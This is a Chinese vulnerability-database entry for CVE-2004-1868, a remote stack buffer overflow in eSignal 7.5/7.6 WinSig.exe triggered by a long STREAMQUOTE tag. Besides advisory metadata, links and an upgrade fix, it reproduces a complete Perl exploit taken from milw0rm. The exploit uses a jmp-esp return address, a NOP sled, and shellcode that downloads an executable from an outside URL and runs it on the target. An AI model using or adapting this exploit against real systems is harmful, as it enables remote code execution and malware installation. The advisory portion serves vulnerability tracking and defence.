CVE-2004-1868
CVSS7.5
发布时间 :2004-03-25 00:00:00
修订时间 :2016-10-17 23:02:02
NMCOE    

[原文]Stack-based buffer overflow in WinSig.exe in eSignal 7.5 and 7.6 allows remote attackers to execute arbitrary code via a long STREAMQUOTE tag.


[CNNVD]ESignal远程缓冲区溢出漏洞(CNNVD-200403-108)

        
        eSignal可提供实时的金融和证券信息的系统。
        eSignal包含的"WinSig.exe"应用程序在处理数据请求时存在问题,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。
        提交超长请求给"WinSig.exe"监听的80端口,当处理此类请求时,如果参数字符串超过1040字符,可触发典型的缓冲区溢出,精心构建提交数据,可能以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:esignal:esignal:7.5
cpe:/a:esignal:esignal:7.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1868
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1868
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-108
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2004-04/0056.html
(PATCH)  BUGTRAQ  20040406 Re: eSignal v7 remote buffer overflow
http://marc.info/?l=bugtraq&m=108025234317408&w=2
(UNKNOWN)  BUGTRAQ  20040325 eSignal v7 remote buffer overflow (exploit)
http://viziblesoft.com/insect/advisories/vz012004-esignal7.txt
(VENDOR_ADVISORY)  MISC  http://viziblesoft.com/insect/advisories/vz012004-esignal7.txt
http://www.securityfocus.com/bid/9978
(VENDOR_ADVISORY)  BID  9978
http://xforce.iss.net/xforce/xfdb/15624
(VENDOR_ADVISORY)  XF  esignal-specs-bo(15624)

- 漏洞信息

ESignal远程缓冲区溢出漏洞
高危 边界条件错误
2004-03-25 00:00:00 2005-10-20 00:00:00
远程  
        
        eSignal可提供实时的金融和证券信息的系统。
        eSignal包含的"WinSig.exe"应用程序在处理数据请求时存在问题,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以进程权限在系统上执行任意指令。
        提交超长请求给"WinSig.exe"监听的80端口,当处理此类请求时,如果参数字符串超过1040字符,可触发典型的缓冲区溢出,精心构建提交数据,可能以进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        eSignal
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.esignal.com/

- 漏洞信息 (166)

eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit (EDBID:166)
windows remote
2004-03-26 Verified
80 VizibleSoft
N/A [点击下载]
#!/usr/bin/perl
#
# eSignal v7.6 remote exploit (c) VizibleSoft =*= http://viziblesoft.com/insect
#
# 25-mAR-2004
#

use IO::Socket;

sub usage 
{
   die("\nUsage: perl $0 host port\n");
}

print "\r\neSignal v7.6 remote exploit, (c) VizibleSoft.com\r\n";

my $ip      = $ARGV[0] || usage();
my $port    = $ARGV[1] || usage();
my $data    = "";
my $ret     = "\xf3\x7b\x20\x7c";	# MFC71.dll "jmp esp"
my $nop     = "\x90";

#
# Used api..
#

$api  = "\x00wininet.dll\x00InternetOpenA\x00".
	"InternetOpenUrlA\x00InternetReadFile\x00kernel32.dll\x00".
	"_lcreat\x00_lwrite\x00_lclose\x00";

#
# Url of file to execute
#

$url = "http://viziblesoft.com/insect/sploits/troy.exe";

#
#
# Filename for our file on remote system

$fname = "setup.exe";

#
#
# Shellcode: downloads and executes file at URL
#

$shellc = "\x90".
"\x8B\xEC\x03\xEA\xB8\xEA\xFE\xFF\xFF\xF7\xD0\x03\xE8\x83\xC5\x0B\x8B\xFD\x4F\xF7".
"\x17\x83\xC7\x04\x83\x3F\xFF\x7C\xF6\xF7\x17\xB8\x5C\x12\x14\x7C\x8B\x18\x55\xFF".
"\xD3\x8B\xF8\x33\xC9\xB1\x03\x8D\x55\x0C\xB8\x58\x12\x14\x7C\x8B\x18\x51\x52\x52".
"\x57\xFF\xD3\x5A\x59\x89\x02\x83\xC2\x03\x42\x8A\x02\x3A\xC5\x7F\xF9\x42\xFE\xC9".
"\x3A\xCD\x7F\xDE\xB8\x5C\x12\x14\x7C\x8B\x18\x8D\x55\x3C\x52\xFF\xD3\x8B\xF8\xB8".
"\x58\x12\x14\x7C\x8B\x18\x53\x8D\x55\x49\x52\x52\x57\xFF\xD3\x5A\x89\x02\x8B\x1C".
"\x24\x8D\x55\x51\x52\x52\x57\xFF\xD3\x5A\x89\x02\x5B\x8D\x55\x59\x52\x52\x57\xFF".
"\xD3\x5A\x89\x02\x33\xD2\x52\x52\x52\x52\x55\xFF\x55\x0C\x33\xD2\x52\xB6\x80\xC1".
"\xE2\x10\x52\x33\xD2\x52\x52\x8D\x4D\x60\x41\x51\x50\xFF\x55\x1A\x89\x45\x1A\x33".
"\xD2\x52\x8D\x55\xF6\x52\xFF\x55\x49\x89\x45\x49\x33\xD2\xB6\x02\x2B\xE2\x83\xEC".
"\x04\x33\xD2\xB6\x02\x54\x8B\xC4\x83\xC0\x08\x52\x50\x8B\x45\x1A\x50\xFF\x55\x2B".
"\x8B\x04\x24\x8D\x54\x24\x04\x50\x52\x8B\x45\x49\x50\xFF\x55\x51\x83\x3C\x24\x01".
"\x7D\xD7\x8B\x45\x49\x50\xFF\x55\x59\x8D\x55\xF6\x52\xB8\x3F\x0E\x81\xF8\x35\x80".
"\x80\x80\x80\xFF\xD0\xB8\xD3\xFC\x80\xF8\x35\x80\x80\x80\x80\xFF\xE0$fname";

$movsb = "\x90\x33\xc9\xb5\x02\xb1\xcc\x8b\xf4\x2b\xf1\x8b\xfc\x33\xd2\xb2\x15\x03\xfa\xf3\xa4";

#
# xor data block
#

$url = $api . $url;
for(my $i=0; $i<length($url); $i++) {
		$data = $data . (substr($url, $i, 1) ^ "\xff"); 
	};

$data .= "\xff\xff\xfe\xfe\xff\xff\xff\xff";

#
# construct overflow string...
#

$shellc .= $data;
$shellc .= ("\xcc" x (712 - length($shellc)));

$shellcode = $nop x (8 * 16) .
	     $shellc .
	     $ret .
	     $movsb .
	     $nop x (191-16);


# print "shellcode len: " . length($shellcode) . "\r\n";

$data = '<STREAMQUOTE>' . $shellcode . 	'</STREAMQUOTE>';

# print "sending data of len: " . length($data) . "\n";

print sendraw($data);

print "[+] Overflow sent / file executed!\n";
exit;

sub sendraw {
        my ($pstr)=@_;
        my $target;
        $target= inet_aton($ip) || die("[-] inet_aton problems");
        socket(S,2,1,getprotobyname('tcp')||0) || die("[-] Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                select(S);              $|=1;
                print $pstr;            my @in=<S>;
                select(STDOUT);         close(S);
                return @in;
        } else { die("[-] Can't connect...\n"); }}

# milw0rm.com [2004-03-26]
		

- 漏洞信息

4583
eSignal STREAMQUOTE Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified, Uncoordinated Disclosure

- 漏洞描述

- 时间线

2004-03-26 Unknow
2006-07-14 2004-04-06

- 解决方案

Upgrade to version 7.6 release 3, build 636a or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站